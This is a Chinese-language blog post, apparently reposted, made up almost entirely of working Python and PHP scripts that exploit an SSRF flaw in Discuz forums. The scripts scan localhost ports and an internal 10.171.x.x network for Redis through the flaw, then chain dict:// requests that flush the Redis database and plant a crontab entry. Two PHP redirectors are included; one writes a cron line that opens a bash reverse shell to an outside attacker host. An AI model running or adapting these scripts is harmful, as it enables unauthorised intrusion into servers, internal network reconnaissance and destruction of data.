Discuz ssrf漏洞利用的几个python脚本

admin

扫描本机开放的端口：

1. #!/usr/bin/env python
   
2. # -*- coding: utf-8 -*-
   
3. # @Author: Lcy
   
4. # @Date:   2016-07-05 20:55:30
   
5. # @Last Modified by:   Lcy
   
6. # @Last Modified time: 2016-10-10 16:26:14
   
7. import requests
   
8. import threading
   
9. import Queue
   
10. import time
    
11. 
    
12. threads_count = 2
    
13. que = Queue.Queue()
    
14. lock = threading.Lock()
    
15. threads = []
    
16. ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
    
17. for i in ports:
    
18.     que.put(str(i))
    
19. def run():
    
20.     while que.qsize() > 0:
    
21.         p = que.get()
    
22.         print p + "       \r",
    
23.         try:
    
24.             url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
    
25.                 port=p)
    
26.             r = requests.get(url,timeout=2.8)
    
27.         except:
    
28.             lock.acquire()
    
29.             print "{port}  Open".format(port=p)
    
30.             lock.release()
    
31. for i in range(threads_count):
    
32.     t = threading.Thread(target=run)
    
33.     threads.append(t)
    
34.     t.setDaemon(True)
    
35.     t.start()
    
36. 
    
37. while que.qsize() > 0:
    
38.     time.sleep(1.0)

复制代码

扫描内网开放6379端口的主机：

1. #!/usr/bin/env python
   
2. # -*- coding: utf-8 -*-
   
3. # @Author: Lcy
   
4. # @Date:   2016-07-05 20:55:30
   
5. # @Last Modified by:   Lcy
   
6. # @Last Modified time: 2016-07-21 14:38:04
   
7. import requests
   
8. import threading
   
9. import Queue
   
10. import time
    
11. threads_count = 20
    
12. que = Queue.Queue()
    
13. lock = threading.Lock()
    
14. threads = []
    
15. ip = "10.171."
    
16. for i in range(1,255):
    
17.     for j in range(1,255):
    
18.         que.put(ip + str(i) + '.'+str(j))
    
19. # for i in range(0,255):
    
20. #     que.put(ip + str(i))
    
21. def run():
    
22.     while que.qsize() > 0:
    
23.         ip = que.get()
    
24.         try:
    
25.             url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
    
26.                 ip=ip,
    
27.                 port="65321")
    
28.             r = requests.get(url,timeout=5)
    
29.             
    
30.             try:
    
31.                 url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
    
32.                 ip=ip,
    
33.                 port="6379")
    
34.                 r = requests.get(url,timeout=5)
    
35.                 lock.acquire()
    
36.                 print ip
    
37.                 lock.release()
    
38.             except :
    
39.                 lock.acquire()
    
40.                 print "{ip}  6379 Open".format(ip=ip)
    
41.                 lock.release()
    
42.         except:
    
43.             pass
    
44. 
    
45. for i in range(threads_count):
    
46.     t = threading.Thread(target=run)
    
47.     threads.append(t)
    
48.     t.setDaemon(True)
    
49.     t.start()
    
50. while que.qsize() > 0:
    
51.     time.sleep(1.0)

复制代码

通过ssrf操作内网redis写任务计划反弹shell:

1. #!/usr/bin/env python
   
2. # coding=utf-8
   
3. # email: ringzero@0x557.org
   
4. 
   
5. import requests
   
6. 
   
7. host = '10.171.26.22'
   
8. port = '6379'
   
9. bhost = 'phpinfo.me'
   
10. bport = '32'
    
11. 
    
12. vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'
    
13. 
    
14. _location = 'http://tools.phpinfo.me/ssrf.php'
    
15. 
    
16. shell_location = 'http://tools.phpinfo.me/shell.php'
    
17. 
    
18. 
    
19. #1 flush db
    
20. 
    
21. _payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(
    
22. 
    
23.     host = host,
    
24. 
    
25.     port = port)
    
26. 
    
27. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
    
28. 
    
29. print exp_uri
    
30. 
    
31. print len(requests.get(exp_uri).content)
    
32. 
    
33. 
    
34. 
    
35. #2 set crontab command
    
36. 
    
37. _payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(
    
38. 
    
39.     host = host,
    
40. 
    
41.     port = port,
    
42. 
    
43.     bhost = bhost,
    
44. 
    
45.     bport = bport)
    
46. 
    
47. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)
    
48. 
    
49. print exp_uri
    
50. 
    
51. print len(requests.get(exp_uri).content)
    
52. 
    
53. 
    
54. 
    
55. #3 config set dir /var/spool/cron/
    
56. 
    
57. _payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(
    
58. 
    
59.     host = host,
    
60. 
    
61.     port = port)
    
62. 
    
63. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
    
64. 
    
65. print exp_uri
    
66. 
    
67. print len(requests.get(exp_uri).content)
    
68. 
    
69. 
    
70. 
    
71. #4 config set dbfilename root
    
72. 
    
73. _payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(
    
74. 
    
75.     host = host,
    
76. 
    
77.     port = port)
    
78. 
    
79. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
    
80. 
    
81. print exp_uri
    
82. 
    
83. print len(requests.get(exp_uri).content)
    
84. 
    
85. 
    
86. 
    
87. #5 save to file
    
88. 
    
89. _payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(
    
90. 
    
91.     host = host,
    
92. 
    
93.     port = port)
    
94. 
    
95. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
    
96. 
    
97. print exp_uri
    
98. 
    
99. print len(requests.get(exp_uri).content)

复制代码

ssrf.php:

1. <?php
   
2. 
   
3. $ip = $_GET['ip'];
   
4. 
   
5. 
   
6. 
   
7. $port = $_GET['port'];
   
8. 
   
9. 
   
10. 
    
11. $scheme = $_GET['s'];
    
12. 
    
13. 
    
14. 
    
15. $data = $_GET['data'];
    
16. 
    
17. 
    
18. 
    
19. header("Location: $scheme://$ip:$port/$data");
    
20. 
    
21. 
    
22. 
    
23. ?>

复制代码

shell.php

1. <?php
   
2. 
   
3. $ip = $_GET['ip'];
   
4. 
   
5. $port = $_GET['port'];
   
6. 
   
7. $bhost = $_GET['bhost'];
   
8. 
   
9. $bport = $_GET['bport'];
   
10. 
    
11. $scheme = $_GET['s'];
    
12. 
    
13. header("Location: $scheme://$ip:$port/set:0:"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a"");
    
14. 
    
15. ?>

复制代码

from:https://phpinfo.me/2017/02/23/1438.html